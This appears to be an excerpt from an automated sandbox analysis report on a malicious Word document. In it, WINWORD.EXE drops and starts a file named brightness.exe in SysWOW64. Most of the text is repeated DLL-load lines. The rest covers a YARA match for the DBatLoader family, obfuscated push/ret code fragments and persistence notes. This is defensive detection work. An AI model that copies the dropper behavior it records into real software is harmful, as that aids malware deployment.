Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Data Obfuscation

Yara detected DBatLoader

Source: Yara match	File source: 7.2.brightness.exe.22d65a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.brightness.exe.28f0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.brightness.exe.22d65a8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3375169126.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3359324067.00000000022D6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_02908798 LoadLibraryW,GetProcAddress,FreeLibrary,

7_2_02908798

Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0291D2FC push 0291D367h; ret	7_2_0291D35F
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_028F32FC push eax; ret	7_2_028F3338
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_028F635C push 028F63B7h; ret	7_2_028F63AF
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_028F635A push 028F63B7h; ret	7_2_028F63AF
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0291D0AC push 0291D125h; ret	7_2_0291D11D
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0291D1F8 push 0291D288h; ret	7_2_0291D280
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0291D144 push 0291D1ECh; ret	7_2_0291D1E4
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_029086B8 push 029086FAh; ret	7_2_029086F2
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_028F6738 push 028F677Ah; ret	7_2_028F6772
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_028F6736 push 028F677Ah; ret	7_2_028F6772
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_028FC4EC push ecx; mov dword ptr [esp], edx	7_2_028FC4F1
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_028FD520 push 028FD54Ch; ret	7_2_028FD544
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_028FCB6C push 028FCCF2h; ret	7_2_028FCCEA
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0290788C push 02907909h; ret	7_2_02907901
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_029068C6 push 02906973h; ret	7_2_0290696B
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_029068C8 push 02906973h; ret	7_2_0290696B
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_028FC9CE push 028FCCF2h; ret	7_2_028FCCEA
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0290E9E8 push ecx; mov dword ptr [esp], edx	7_2_0290E9ED
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_02908910 push 02908948h; ret	7_2_02908940
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0290A917 push 0290A950h; ret	7_2_0290A948
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0290A918 push 0290A950h; ret	7_2_0290A948
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0290890E push 02908948h; ret	7_2_02908940
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_02902EE0 push 02902F56h; ret	7_2_02902F4E
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0291BFA0 push 0291C1C8h; ret	7_2_0291C1C0
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_02902FEB push 02903039h; ret	7_2_02903031
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_02902FEC push 02903039h; ret	7_2_02903031
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_02905DFC push ecx; mov dword ptr [esp], edx	7_2_02905DFE

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Executable created and started: C:\Windows\SysWOW64\brightness.exe

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Windows\SysWOW64\brightness.exe

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Windows\SysWOW64\brightness.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_0290A954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

7_2_0290A954

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
